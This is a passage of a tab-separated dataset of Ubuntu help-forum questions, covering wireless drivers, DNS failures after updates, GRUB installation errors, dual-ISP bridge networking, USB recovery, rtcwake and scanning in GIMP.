bcmand the output was `08:00.0 network controller : broadcom corporation bcm43142 802.11b/g/n ( rev 01 ) ` also the rfkill list command gave this output 1 : hci0 : bluetooth soft blocked : no hard blocked : no ` iwconfig command says that there is no wireless extensions . i have installed ubuntu 13.04 on an external usb hard drive .
357125	how to resolve intermittent dns failure after updates ?	ubuntu 12.04 running happily begins experiencing intermittent dns resolution failure after updating . following is the history.log for same : start-date : 2013-10-09 07:33:11 commandline : aptdaemon role='role-install-file ' sender=':1.103' install : bluez-alsa : i386 ( 4.98-2ubuntu7 , automatic ) , libsdl-ttf2.0-0 : i386 ( 2.0.9-1.1ubuntu1 , automatic ) , libgconf-2-4 : i386 ( 3.2.5-0ubuntu2 , automatic ) , libstdc++5 : i386 ( 3.3.6-25ubuntu1 , automatic ) , ia32-libs-multiarch : i386 ( 20090808ubuntu36 , automatic ) , rpm2cpio : amd64 ( 4.9.1.1-1ubuntu0.2 , automatic ) , libqt4-declarative : i386 ( 4.8.1-0ubuntu4.4 , automatic ) , libgail18 : i386 ( 2.24.10-0ubuntu6 , automatic ) , libao-common : amd64 ( 1.1.0-1ubuntu2 , automatic ) , libqt4-qt3support : i386 ( 4.8.1-0ubuntu4.4 , automatic ) , libunistring0 : i386 ( 0.9.3-5 , automatic ) , libcupsimage2 : i386 ( 1.5.3-0ubuntu8 , automatic ) , libidn11 : i386 ( 1.23-2 , automatic ) , debhelper : amd64 ( 9.20120115ubuntu3 , automatic ) , libnss3 : i386 ( 3.14.3-0ubuntu0.12.04.1 , automatic ) , libcaca0 : i386 ( 0.99.beta17-2.1ubuntu2 , automatic ) , gtk2-engines : i386 ( 2.20.2-1ubuntu1 , automatic ) , libgudev-1.0-0 : i386 ( 175-0ubuntu9.4 , automatic ) , libacl1 : i386 ( 2.2.51-5ubuntu1 , automatic ) , libcdparanoia0 : i386 ( 3.10.2+debian-10ubuntu1 , automatic ) , libavc1394-0 : i386 ( 0.5.3-1ubuntu2 , automatic ) , ia32-libs : amd64 ( 20090808ubuntu36 , automatic ) , libbz2-1.0 : i386 ( 1.0.6-1 , automatic ) , libaio1 : i386 ( 0.3.109-2ubuntu1 , automatic ) , odbcinst1debian2 : i386 ( 2.2.14p2-5ubuntu3 , automatic ) , libqt4-test : i386 ( 4.8.1-0ubuntu4.4 , automatic ) , libqt4-script : i386 ( 4.8.1-0ubuntu4.4 , automatic ) , libqt4-designer : i386 ( 4.8.1-0ubuntu4.4 , automatic ) , libsdl-mixer1.2 : i386 ( 1.2.11-7 , automatic ) , libqt4-network : i386 ( 4.8.1-0ubuntu4.4 , automatic ) , libqt4-dbus : i386 ( 4.8.1-0ubuntu4.4 , automatic ) , libcap2 : i386 ( 2.22-1ubuntu3 , automatic ) , libproxy1 : i386 ( 0.4.7-0ubuntu4.1 , automatic ) , ibus-gtk : i386 ( 1.4.1-3ubuntu1 , automatic ) , libtdb1 : i386 ( 1.2.9-4 , automatic ) , libspeex1 : i386 ( 1.2~rc1-3ubuntu2 , automatic ) , gvfs-libs : i386 ( 1.12.1-0ubuntu1.2 , automatic ) , dh-apparmor : amd64 ( 2.7.102-0ubuntu3.9 , automatic ) , m4 : amd64 ( 1.4.16-2ubuntu1 , automatic ) , librpmio2 : amd64 ( 4.9.1.1-1ubuntu0.2 , automatic ) , librpm2 : amd64 ( 4.9.1.1-1ubuntu0.2 , automatic ) , rpm-common : amd64 ( 4.9.1.1-1ubuntu0.2 , automatic ) , libgomp1 : i386 ( 4.6.3-1ubuntu5 , automatic ) , libibus-1.0-0 : i386 ( 1.4.1-3ubuntu1 , automatic ) , libvisual-0.4-0 : i386 ( 0.4.0-4 , automatic ) , libcanberra-gtk-module : i386 ( 0.28-3ubuntu3 , automatic ) , libcanberra0 : i386 ( 0.28-3ubuntu3 , automatic ) , gtk2-engines-murrine : i386 ( 0.98.2-0ubuntu1 , automatic ) , libwavpack1 : i386 ( 4.60.1-2 , automatic ) , libqt4-opengl : i386 ( 4.8.1-0ubuntu4.4 , automatic ) , libsoup-gnome2.4-1 : i386 ( 2.38.1-1 , automatic ) , libmysqlclient18 : i386 ( 5.5.32-0ubuntu0.12.04.1 , automatic ) , gstreamer0.10-plugins-good : i386 ( 0.10.31-1ubuntu1.2 , automatic ) , libc6-i386 : amd64 ( 2.15-0ubuntu10.4 , automatic ) , libqt4-xmlpatterns : i386 ( 4.8.1-0ubuntu4.4 , automatic ) , librsvg2-common : i386 ( 2.36.1-0ubuntu1 , automatic ) , libncursesw5 : i386 ( 5.9-4 , automatic ) , libiec61883-0 : i386 ( 1.2.0-0.1ubuntu1 , automatic ) , libsdl-image1.2 : i386 ( 1.2.10-3 , automatic ) , libsdl1.2debian : i386 ( 1.2.14-6.4ubuntu3 , automatic ) , libxaw7 : i386 ( 1.0.9-3ubuntu1 , automatic ) , libgdbm3 : i386 ( 1.8.3-10 , automatic ) , libcurl3 : i386 ( 7.22.0-3ubuntu4.3 , automatic ) , libqtcore4 : i386 ( 4.8.1-0ubuntu4.4 , automatic ) , libesd0 : i386 ( 0.2.41-10build3 , automatic ) , libmikmod2 : i386 ( 3.1.12-2 , automatic ) , oss-compat : amd64 ( 1 , automatic ) , libcroco3 : i386 ( 0.6.5-1ubuntu0.1 , automatic ) , libpulse-mainloop-glib0 : i386 ( 1.1-0ubuntu15.4 , automatic ) , libtheora0 : i386 ( 1.1.1+dfsg.1-3ubuntu2 , automatic ) , libaa1 : i386 ( 1.4p5-39ubuntu1 , automatic ) , libao4 : i386 ( 1.1.0-1ubuntu2 , automatic ) , pax : amd64 ( 20120216-1 , automatic ) , libxmu6 : i386 ( 1.1.0-3 , automatic ) , libcanberra-gtk0 : i386 ( 0.28-3ubuntu3 , automatic ) , libvorbisfile3 : i386 ( 1.3.2-1ubuntu3 , automatic ) , libqt4-sql : i386 ( 4.8.1-0ubuntu4.4 , automatic ) , esound-common : amd64 ( 0.2.41-10build3 , automatic ) , libqt4-svg : i386 ( 4.8.1-0ubuntu4.4 , automatic ) , libgail-common : i386 ( 2.24.10-0ubuntu6 , automatic ) , heirloom-mailx : amd64 ( 12.5-1build1 , automatic ) , libraw1394-11 : i386 ( 2.0.7-1ubuntu1 , automatic ) , libnspr4 : i386 ( 4.9.5-0ubuntu0.12.04.1 , automatic ) , libshout3 : i386 ( 2.2.2-7ubuntu1 , automatic ) , libdv4 : i386 ( 1.0.0-3ubuntu1 , automatic ) , rpm : amd64 ( 4.9.1.1-1ubuntu0.2 , automatic ) , librpmbuild2 : amd64 ( 4.9.1.1-1ubuntu0.2 , automatic ) , libqt4-xml : i386 ( 4.8.1-0ubuntu4.4 , automatic ) , gstreamer0.10-x : i386 ( 0.10.36-1ubuntu0.1 , automatic ) , libgettextpo0 : i386 ( 0.18.1.1-5ubuntu3 , automatic ) , libxss1 : i386 ( 1.2.1-2 , automatic ) , libsdl-net1.2 : i386 ( 1.2.7-5 , automatic ) , libvisual-0.4-plugins : i386 ( 0.4.0.dfsg.1-7 , automatic ) , libudev0 : i386 ( 175-0ubuntu9.4 , automatic ) , lsb-invalid-mta : amd64 ( 4.0-0ubuntu20.3 , automatic ) , libgnome-keyring0 : i386 ( 3.2.2-2 , automatic ) , gtk2-engines-pixbuf : i386 ( 2.24.10-0ubuntu6 , automatic ) , libqtgui4 : i386 ( 4.8.1-0ubuntu4.4 , automatic ) , libtag1c2a : i386 ( 1.7-1ubuntu5 , automatic ) , librsvg2-2 : i386 ( 2.36.1-0ubuntu1 , automatic ) , libssl0.9.8 : i386 ( 0.9.8o-7ubuntu3.1 , automatic ) , libmad0 : i386 ( 0.15.1b-7ubuntu1 , automatic ) , gtk2-engines-oxygen : i386 ( 1.2.2-0ubuntu1.1 , automatic ) , html2text : amd64 ( 1.3.2a-15 , automatic ) , lib32z1 : amd64 ( 1.2.3.4.dfsg-3ubuntu4 , automatic ) , xaw3dg : i386 ( 1.5+e-18.1ubuntu1 , automatic ) , librpmsign0 : amd64 ( 4.9.1.1-1ubuntu0.2 , automatic ) , libpulsedsp : i386 ( 1.1-0ubuntu15.4 , automatic ) , gvfs : i386 ( 1.12.1-0ubuntu1.2 , automatic ) , libqt4-sql-mysql : i386 ( 4.8.1-0ubuntu4.4 , automatic ) , libodbc1 : i386 ( 2.2.14p2-5ubuntu3 , automatic ) , libqt4-scripttools : i386 ( 4.8.1-0ubuntu4.4 , automatic ) , librtmp0 : i386 ( 2.4~20110711.gitc28f1bab-1 , automatic ) , libqtwebkit4 : i386 ( 2.2.1-1ubuntu4 , automatic ) , lsb-core : amd64 ( 4.0-0ubuntu20.3 , automatic ) , libattr1 : i386 ( 2.4.46-5ubuntu1 , automatic ) , libxp6 : i386 ( 1.0.1-2ubuntu0.12.04.1 , automatic ) , libaudio2 : i386 ( 1.9.3-4ubuntu0.1 , automatic ) , alien : amd64 ( 8.86 , automatic ) , libxv1 : i386 ( 1.0.6-2ubuntu0.1 , automatic ) , libslang2 : i386 ( 2.2.4-3ubuntu1 , automatic ) , ncurses-term : amd64 ( 5.9-4 , automatic ) , mysql-common : amd64 ( 5.5.32-0ubuntu0.12.04.1 , automatic ) , gstreamer0.10-plugins-base : i386 ( 0.10.36-1ubuntu0.1 , automatic ) , libmng1 : i386 ( 1.0.10-3 , automatic ) , glib-networking : i386 ( 2.32.1-1ubuntu2 , automatic ) , libsoup2.4-1 : i386 ( 2.38.1-1 , automatic ) , libtag1-vanilla : i386 ( 1.7-1ubuntu5 , automatic ) , libaudiofile1 : i386 ( 0.3.3-2 , automatic ) upgrade : libcurl3 : amd64 ( 7.22.0-3ubuntu4.2 , 7.22.0-3ubuntu4.3 ) , libpulse-mainloop-glib0 : amd64 ( 1.1-0ubuntu15.3 , 1.1-0ubuntu15.4 ) , libpulse0 : amd64 ( 1.1-0ubuntu15.3 , 1.1-0ubuntu15.4 ) , libpulse0 : i386 ( 1.1-0ubuntu15.3 , 1.1-0ubuntu15.4 ) , libpulsedsp : amd64 ( 1.1-0ubuntu15.3 , 1.1-0ubuntu15.4 ) , libaudio2 : amd64 ( 1.9.3-4 , 1.9.3-4ubuntu0.1 ) end-date : 2013-10-09 07:34:25 start-date : 2013-10-09 17:47:50 commandline : aptdaemon role='role-commit-packages ' sender=':1.133' install : linux-headers-3.2.0-54 : amd64 ( 3.2.0-54.82 ) , linux-image-3.5.0-41-generic : amd64 ( 3.5.0-41.64~precise1 ) , linux-headers-3.5.0-41-generic : amd64 ( 3.5.0-41.64~precise1 ) , linux-headers-3.5.0-41 : amd64 ( 3.5.0-41.64~precise1 ) , linux-headers-3.2.0-54-generic : amd64 ( 3.2.0-54.82 ) upgrade : libsmbclient : amd64 ( 3.6.3-2ubuntu2.6 , 3.6.3-2ubuntu2.8 ) , libpolkit-backend-1-0 : amd64 ( 0.104-1ubuntu1 , 0.104-1ubuntu1.1 ) , apt-transport-https : amd64 ( 0.8.16~exp12ubuntu10.12 , 0.8.16~exp12ubuntu10.14 ) , libpam-winbind : amd64 ( 3.6.3-2ubuntu2.6 , 3.6.3-2ubuntu2.8 ) , libldap-2.4-2 : amd64 ( 2.4.28-1.1ubuntu4.3 , 2.4.28-1.1ubuntu4.4 ) , libldap-2.4-2 : i386 ( 2.4.28-1.1ubuntu4.3 , 2.4.28-1.1ubuntu4.4 ) , libsane-hpaio : amd64 ( 3.12.2-1ubuntu3.1 , 3.12.2-1ubuntu3.3 ) , python-ubuntuone-client : amd64 ( 3.0.2-0ubuntu1 , 3.0.2-0ubuntu2 ) , ubuntuone-client : amd64 ( 3.0.2-0ubuntu1 , 3.0.2-0ubuntu2 ) , smbclient : amd64 ( 3.6.3-2ubuntu2.6 , 3.6.3-2ubuntu2.8 ) , libraw5 : amd64 ( 0.14.4-0ubuntu2.1 , 0.14.4-0ubuntu2.2 ) , thunderbird-locale-en-us : amd64 ( 17.0.8+build1-0ubuntu0.12.04.1 , 24.0+build1-0ubuntu0.12.04.1 ) , pulseaudio-module-bluetooth : amd64 ( 1.1-0ubuntu15.3 , 1.1-0ubuntu15.4 ) , pulseaudio : amd64 ( 1.1-0ubuntu15.3 , 1.1-0ubuntu15.4 ) , python-openssl : amd64 ( 0.12-1ubuntu2 , 0.12-1ubuntu2.1 ) , language-selector-gnome : amd64 ( 0.79.3 , 0.79.4 ) , gnome-settings-daemon : amd64 ( 3.4.2-0ubuntu0.6.2 , 3.4.2-0ubuntu0.6.3 ) , thunderbird : amd64 ( 17.0.8+build1-0ubuntu0.12.04.1 , 24.0+build1-0ubuntu0.12.04.1 ) , libpython2.7 : amd64 ( 2.7.3-0ubuntu3.2 , 2.7.3-0ubuntu3.4 ) , python-software-properties : amd64 ( 0.82.7.3 , 0.82.7.5 ) , firefox-globalmenu : amd64 ( 23.0+build2-0ubuntu0.12.04.1 , 24.0+build1-0ubuntu0.12.04.1 ) , printer-driver-postscript-hp : amd64 ( 3.12.2-1ubuntu3.1 , 3.12.2-1ubuntu3.3 ) , libpolkit-gobject-1-0 : amd64 ( 0.104-1ubuntu1 , 0.104-1ubuntu1.1 ) , hplip : amd64 ( 3.12.2-1ubuntu3.1 , 3.12.2-1ubuntu3.3 ) , pulseaudio-module-x11 : amd64 ( 1.1-0ubuntu15.3 , 1.1-0ubuntu15.4 ) , libwbclient0 : amd64 ( 3.6.3-2ubuntu2.6 , 3.6.3-2ubuntu2.8 ) , language-selector-common : amd64 ( 0.79.3 , 0.79.4 ) , software-properties-common : amd64 ( 0.82.7.3 , 0.82.7.5 ) , usb-creator-gtk : amd64 ( 0.2.38 , 0.2.38.2 ) , linux-image-generic-lts-quantal : amd64 ( 3.5.0.40.46 , 3.5.0.41.47 ) , pulseaudio-module-gconf : amd64 ( 1.1-0ubuntu15.3 , 1.1-0ubuntu15.4 ) , ubuntu-system-service : amd64 ( 0.2.2 , 0.2.2.1 ) , libgnutls26 : amd64 ( 2.12.14-5ubuntu3.4 , 2.12.14-5ubuntu3.5 ) , libgnutls26 : i386 ( 2.12.14-5ubuntu3.4 , 2.12.14-5ubuntu3.5 ) , policykit-1 : amd64 ( 0.104-1ubuntu1 , 0.104-1ubuntu1.1 ) , libapt-inst1.4 : amd64 ( 0.8.16~exp12ubuntu10.12 , 0.8.16~exp12ubuntu10.14 ) , apport : amd64 ( 2.0.1-0ubuntu17.4 , 2.0.1-0ubuntu17.5 ) , libpam-smbpass : amd64 ( 3.6.3-2ubuntu2.6 , 3.6.3-2ubuntu2.8 ) , python2.7 : amd64 ( 2.7.3-0ubuntu3.2 , 2.7.3-0ubuntu3.4 ) , gir1.2-polkit-1.0 : amd64 ( 0.104-1ubuntu1 , 0.104-1ubuntu1.1 ) , apt-utils : amd64 ( 0.8.16~exp12ubuntu10.12 , 0.8.16~exp12ubuntu10.14 ) , samba-common : amd64 ( 3.6.3-2ubuntu2.6 , 3.6.3-2ubuntu2.8 ) , linux-headers-generic-lts-quantal : amd64 ( 3.5.0.40.46 , 3.5.0.41.47 ) , apt : amd64 ( 0.8.16~exp12ubuntu10.12 , 0.8.16~exp12ubuntu10.14 ) , firefox : amd64 ( 23.0+build2-0ubuntu0.12.04.1 , 24.0+build1-0ubuntu0.12.04.1 ) , rtkit : amd64 ( 0.10-2 , 0.10-2ubuntu0.12.04.1 ) , libhpmud0 : amd64 ( 3.12.2-1ubuntu3.1 , 3.12.2-1ubuntu3.3 ) , apt-xapian-index : amd64 ( 0.44ubuntu5 , 0.44ubuntu5.1 ) , libsyncdaemon-1.0-1 : amd64 ( 3.0.2-0ubuntu1 , 3.0.2-0ubuntu2 ) , ifupdown : amd64 ( 0.7~beta2ubuntu8 , 0.7~beta2ubuntu10 ) , python-problem-report : amd64 ( 2.0.1-0ubuntu17.4 , 2.0.1-0ubuntu17.5 ) , libcurl3-nss : amd64 ( 7.22.0-3ubuntu4.2 , 7.22.0-3ubuntu4.3 ) , software-properties-gtk : amd64 ( 0.82.7.3 , 0.82.7.5 ) , linux-headers-generic : amd64 ( 3.2.0.53.63 , 3.2.0.54.64 ) , vino : amd64 ( 3.4.2-0ubuntu1.2 , 3.4.2-0ubuntu1.3 ) , google-chrome-stable : amd64 ( 29.0.1547.65-r220622 , 30.0.1599.66-1 ) , libapt-pkg4.12 : amd64 ( 0.8.16~exp12ubuntu10.12 , 0.8.16~exp12ubuntu10.14 ) , firefox-locale-en : amd64 ( 23.0+build2-0ubuntu0.12.04.1 , 24.0+build1-0ubuntu0.12.04.1 ) , isc-dhcp-client : amd64 ( 4.1.esv-r4-0ubuntu5.8 , 4.1.esv-r4-0ubuntu5.9 ) , samba : amd64 ( 3.6.3-2ubuntu2.6 , 3.6.3-2ubuntu2.8 ) , linux-generic-lts-quantal : amd64 ( 3.5.0.40.46 , 3.5.0.41.47 ) , printer-driver-hpcups : amd64 ( 3.12.2-1ubuntu3.1 , 3.12.2-1ubuntu3.3 ) , jockey-common : amd64 ( 0.9.7-0ubuntu7.10 , 0.9.7-0ubuntu7.11 ) , usb-creator-common : amd64 ( 0.2.38 , 0.2.38.2 ) , python2.7-minimal : amd64 ( 2.7.3-0ubuntu3.2 , 2.7.3-0ubuntu3.4 ) , thunderbird-globalmenu : amd64 ( 17.0.8+build1-0ubuntu0.12.04.1 , 24.0+build1-0ubuntu0.12.04.1 ) , thunderbird-gnome-support : amd64 ( 17.0.8+build1-0ubuntu0.12.04.1 , 24.0+build1-0ubuntu0.12.04.1 ) , jockey-gtk : amd64 ( 0.9.7-0ubuntu7.10 , 0.9.7-0ubuntu7.11 ) , libpolkit-agent-1-0 : amd64 ( 0.104-1ubuntu1 , 0.104-1ubuntu1.1 ) , python-apport : amd64 ( 2.0.1-0ubuntu17.4 , 2.0.1-0ubuntu17.5 ) , rsyslog : amd64 ( 5.8.6-1ubuntu8.4 , 5.8.6-1ubuntu8.5 ) , libcurl3-gnutls : amd64 ( 7.22.0-3ubuntu4.2 , 7.22.0-3ubuntu4.3 ) , linux-libc-dev : amd64 ( 3.2.0-53.81 , 3.2.0-54.82 ) , samba-common-bin : amd64 ( 3.6.3-2ubuntu2.6 , 3.6.3-2ubuntu2.8 ) , winbind : amd64 ( 3.6.3-2ubuntu2.6 , 3.6.3-2ubuntu2.8 ) , isc-dhcp-common : amd64 ( 4.1.esv-r4-0ubuntu5.8 , 4.1.esv-r4-0ubuntu5.9 ) , apport-gtk : amd64 ( 2.0.1-0ubuntu17.4 , 2.0.1-0ubuntu17.5 ) , thunderbird-locale-en : amd64 ( 17.0.8+build1-0ubuntu0.12.04.1 , 24.0+build1-0ubuntu0.12.04.1 ) , pulseaudio-utils : amd64 ( 1.1-0ubuntu15.3 , 1.1-0ubuntu15.4 ) , printer-driver-hpijs : amd64 ( 3.12.2-1ubuntu3.1 , 3.12.2-1ubuntu3.3 ) , hplip-data : amd64 ( 3.12.2-1ubuntu3.1 , 3.12.2-1ubuntu3.3 ) end-date : 2013-10-09 17:50:31 start-date : 2013-10-10 13:43:13 commandline : aptdaemon role='role-commit-packages ' sender=':1.146' upgrade : gpgv : amd64 ( 1.4.11-3ubuntu2.3 , 1.4.11-3ubuntu2.4 ) , gnupg : amd64 ( 1.4.11-3ubuntu2.3 , 1.4.11-3ubuntu2.4 ) end-date : 2013-10-10 13:43:21 start-date : 2013-10-10 17:16:44 install : openprinting-ppds-pxlmono-samsung : amd64 ( 20130321-1lsb3.2 ) end-date : 2013-10-10 17:16:47 start-date : 2013-10-12 02:23:21 commandline : aptdaemon role='role-commit-packages ' sender=':1.90' upgrade : apt-transport-https : amd64 ( 0.8.16~exp12ubuntu10.14 , 0.8.16~exp12ubuntu10.15 ) , accountsservice : amd64 ( 0.6.15-2ubuntu9.6 , 0.6.15-2ubuntu9.6.1 ) , libapt-inst1.4 : amd64 ( 0.8.16~exp12ubuntu10.14 , 0.8.16~exp12ubuntu10.15 ) , libaccountsservice0 : amd64 ( 0.6.15-2ubuntu9.6 , 0.6.15-2ubuntu9.6.1 ) , apt-utils : amd64 ( 0.8.16~exp12ubuntu10.14 , 0.8.16~exp12ubuntu10.15 ) , apt : amd64 ( 0.8.16~exp12ubuntu10.14 , 0.8.16~exp12ubuntu10.15 ) , gir1.2-accountsservice-1.0 : amd64 ( 0.6.15-2ubuntu9.6 , 0.6.15-2ubuntu9.6.1 ) , libapt-pkg4.12 : amd64 ( 0.8.16~exp12ubuntu10.14 , 0.8.16~exp12ubuntu10.15 ) end-date : 2013-10-12 02:23:34 start-date : 2013-10-12 03:34:14 commandline : aptdaemon role='role-commit-packages ' sender=':1.100' upgrade : tzdata : amd64 ( 2013d-0ubuntu0.12.04 , 2013g-0ubuntu0.12.04 ) end-date : 2013-10-12 03:34:18 standard `` googled '' workaround of disabling dnsmasq failed . updates included kernel ( i think ... ) , learned of grub - same problem when booting with all available kernels . what files/command-outputs/events/etc . to post/include to ensure anyone looking at this problem has all the relevant data ? i 'm not sure how to troubleshoot further besides rolling back updates , or starting from a fresh install and updating incrementally until the problem is reproduced ?
357126	is there an 'offical ' way to store data in utouch-apps ?	through qml there are several ways to store data . is there any 'offical ' way to store data in ubuntu-touch ?
357128	dispaly problem installing ubun12.04 on hp 2000 i3 3110m cpu	i have no display when trying to install ubuntu 12.04 lts 32 bit on my laptop . actually there is some very faint display with little brightness . the 64 bit version of 12.04 is for amd did not work too . please suggest some way out . my laptop is currently having windows 7 .
357130	not able to ping vm from ubuntu	i have ubuntu 12.x and installed vm . i am not able to telnet/sftp/ftp/ping to vm ( linux/solaris ) even after selecting `` host only adopter '' in the vm . earlier it was working on my laptop but after some upgrade/change , now i am not able to ping the vm . please help .
357131	how can i switch between open applications ?	pressing alt + tab brings up a carousel of all the icons of my open applications , and by hitting tab i can cycle through them . by releasing tab it brings the window of the application i 'm currently on to the front of the screen . but how do i quickly and efficiently jump to an application that has multiple windows open ? i often have multiple terminal windows open , for example . but i have to cycle onto the terminal icon , and then cycle through all of the open terminal windows to find the window i want . in osx , an application with multiple windows can still be quickly 'tabbed ' into because it opens the last window of the application that you were working on ( i think ) . can i emulate this behaviour , or at least speed up my workflow in ubuntu ? i want to jump between sublime text and the last terminal window i was working in ( of my many terminal windows ) .
357134	install ubuntu to a preformatted partition	i tried to install ubuntu from a usb stick but i got confused when it started to install on my external usb drive . what i want to do is use an existing partition on one of my 2 1tb hard drives which has already been partitioned . can you help please ?
357135	problem with driver for wireless	how can i replce my default driver for wireless atheros ar9287 with atheros ar5b97 ?
357138	corrupt usb . is there any way to fix it ?	i 'm really new to linux , so i might seems to be stupid from time to time . but anyways , i unplugged a usb flash memory from my computer , while running windows xp . i think that this got it corrupt in some way . i ca n't solve this problem in windows . i heard that linux seems to be much better at fixing this kinda problems . i found this thread . however i ca n't seems to find my usb device by using mount command . i can find it when looking at lsusb . the problem is that i ca n't find the device address . edit : i need to access some files from the usb device - 8gb far32 . i only care about the word-documents on it , but it would be nice , if i could grab some .htm and .css files too . i ca n't open the usb flash memory because its corrupted . is there a way to grab the files , or better fixing the usb . my linux machine is running xubuntu , however i can grab standard ubuntu if it 's needed . edit2 : fdisk -l gives me this disk /dev/sdb : 7743 mb , 7743995904 bytes 80 heads , 16 sectors/track , 11816 cylinders , total 15124992 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc3072e18 device boot start end blocks id system /dev/sdb1 * 8064 15124991 7558464 c w95 fat32 ( lba ) sorry for misspellings my main language is not english
357140	installing linux 64bit	so far i have tried to install kubuntu 32 bit kubuntu 64 bit fedora 64 bit and linux mint 64 bit ( no dualboot ) system specs : amd fx-6300 gygabite 970a-ud3 160 gb sata hard drive radeon hd 4800 4 gb ddr3 ram i could install kubuntu 32 bit without problems but than i tried installing the 64 bit version and it always prompted the error ( initramfs ) unable to find a medium containing a live file system after reading that it used to happen on usb3-ports i checked and it happens for me only on the usb2 ports . when i plug it in the usb3 port the installation starts . but at the end it prompted the failure : failed to install grub-efi to /target/ than i installed kubuntu 64 bit out of the live system and it succeeded . apparently . when i tried to boot from the hard drive nothing happened . just a blinking minus . so i reinstalled grub2 in chroot and it succeeded again . but again , it will not start . so i checked a script that i found on a forum which will show me the destination of the grub bootloader and it found nothing . so out of desperation i tried other linux versions . fedora will not start at all , and linux mint starts the live system but when i install it , it failed to install grub-efi again ( with error message ) . also i have the problem that my internet connection does n't work when i load into a live system . is there someone who has another idea ? i just want a running 64 bit version of kubuntu . sorry for bad english ( not my native language ) update i got internet working by activating the iommu in the bios . i also get rid of the ( initramfs ) unable to find a medium containing a live file system error if i plug the usb drive in a usb2 port . unfortunately i am still stuck with the grub error . update 2 according to this thread it is not possible for me to install 13.04 due to a bug in grub . so i installed kubuntu 12.10 64-bit and it worked ! at the moment i am upgrading my os to 13.04 and then i hope it is working ...
357141	i want to access the ssh on my college 's lan but right now i am at home so i am not connected to its network	i used to connect to my college 's server via the command ssh user-profile @ server-ip-address now i returned home and am unfortunately no longer connected to the network . when i try the same command that i used to give ( the above one ) it just keeps on showing that its trying to connect but it doesnt . how can i access my user profile on the college 's server sitting at my home pc ?
357142	networking with two isp	i 'm trying to configure two isp on different network cards and at the same time to use bridge in order work with virtual machines and kvm . the current network configuration can be seen below : auto lo iface lo inet loopback auto eth0 iface eth0 inet manual auto eth1 iface eth1 inet manual auto br0 iface br0 inet static address 192.168.1.101 network 192.168.1.0 netmask 255.255.255.0 broadcast 192.168.1.255 gateway 192.168.1.1 bridge_ports eth0 bridge_stp off bridge_fd 0 bridge_maxwait 0 dns-nameservers 8.8.8.8 post-up ip route add default via 192.168.1.1 dev br0 table isp1 post-up ip rule add from 192.168.1.0/24 table isp1 auto br1 iface br1 inet static address xx.yy.zz.55 netmask 255.255.255.0 bridge_ports eth1 bridge_stp off bridge_fd 0 bridge_maxwait 0 dns-nameservers 8.8.8.8 post-up ip route add default via xx.yy.zz.1 dev br1 table isp2 post-up ip rule add from xx.yy.zz.0/24 table isp2 now what are my problems : with the current configuration i ca n't ssh on 192.168.1.101 from another computer on lan , but i can ssh into any virtual machines on the lan created on the pc . same goes for ping ... i 'll give tcpdump output bellow : tcpdump -nn -i br0 host 192.168.1.105 tcpdump : verbose output suppressed , use -v or -vv for full protocol decode listening on br0 , link-type en10mb ( ethernet ) , capture size 65535 bytes 15:55:17.517347 ip 192.168.1.105 > 192.168.1.101 : icmp echo request , id 26609 , seq 1 , length 64 15:55:17.517372 ip 192.168.1.101 > 192.168.1.105 : icmp echo reply , id 26609 , seq 1 , length 64 15:55:18.514642 ip 192.168.1.105 > 192.168.1.101 : icmp echo request , id 26609 , seq 2 , length 64 15:55:18.514668 ip 192.168.1.101 > 192.168.1.105 : icmp echo reply , id 26609 , seq 2 , length 64 this is what i see on the other end : ping 192.168.1.101 ( 192.168.1.101 ) 56 ( 84 ) bytes of data . -- - 192.168.1.101 ping statistics -- - 2 packets transmitted , 0 received , 100 % packet loss , time 999ms i ca n't access pc using the external ip ( xx.yy.zz.55 ) . i canse someone will need the current ip route and rule you can see below : # ip r show default via 192.168.1.1 dev br0 xx.yy.zz.0/24 dev br1 proto kernel scope link src xx.yy.zz.55 169.254.0.0/16 dev br1 scope link metric 1000 192.168.1.0/24 dev br0 proto kernel scope link src 192.168.1.101 192.168.122.0/24 dev virbr0 proto kernel scope link src 192.168.122.1 # ip r show table isp1 default via 192.168.1.1 dev br0 # ip r show table isp2 default via xx.yy.zz.1 dev br1 # ip rule show 0 : from all lookup local 32764 : from 192.168.1.0/24 lookup isp1 32765 : from 89.35.223.0/24 lookup isp2 32766 : from all lookup main 32767 : from all lookup default thank you !
357144	how can i manage my genealogy data on ubuntu ?	i use several genealogy applications on windows . what applications for genealogy are available on ubuntu and how would i move my current genealogy data to ubuntu ?
357147	there is no sound when testing for 13.04 amd 64	installed 13.04 amd 64 onto an aspire one 722 laptop . there is no sound , even when i test it within the settings . how do i fix this ? thank you .
357152	/dev/rtc0 not enabled for wakeup events and can not write '0 ' to /sys/class/rtc/rtc0/wakealarm	i am having ubuntu 13.04 desktop 64bit when running rtcwake -s 30 , i get following results : rtcwake : assuming rtc uses utc ... rtcwake : open failed : /sys/class/rtc/rtc0/device/power/wakeup : no such file or directory rtcwake : /dev/rtc0 not enabled for wakeup events running fwts s3 -- s3-quirks -a , i get a similar answer in the log : can not write '0 ' to /sys/class/rtc/rtc0/wakealarm running sudo sh -c `` echo 0 > /sys/class/rtc/rtc0/wakealarm , i get the result : sh : 1 : can not create /sys/class/rtc/rtc0/wakealarm : directory nonexistent how this can be fixed ? or how to enable /dev/rtc0 ?
357155	sudo : unable to resolve host ubuntu-server	i have a problem with sudo . every time when i trying to use sudo i got this problem : sudo : unable to resolve host ubuntu-server my /etc/hosts file : 127.0.0.1 localhost 127.0.1.1 ubuntu-server # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters /etc/hostname gives : ubuntu-server i think there is some other setting that causes the unable to resole host , but i can not find these .
357156	where 's the scanned image ?	ubuntu 13.04 gimp 2.8.4 hp officejet 6600 scanner/printer hplip 3.12.11 ( drivers & stuff for the hp scanner/printer ) when i scan in gimp ( file- > scan ... ) , it gives me a `` scan successful '' message after a couple minutes . the scanner/printer also displays that the scan was successful on it 's little screen . no error messages or anything like that . problem is ... the scanned image does n't automatically display in gimp once it 's scanned . so i 'm guessing that it 's scanned elsewhere or something ? am i just missing a step or if the scanned image actually scanned to a file that i have to open in gimp ? or am i going about this all wrong ? i 've never scanned via linux before .
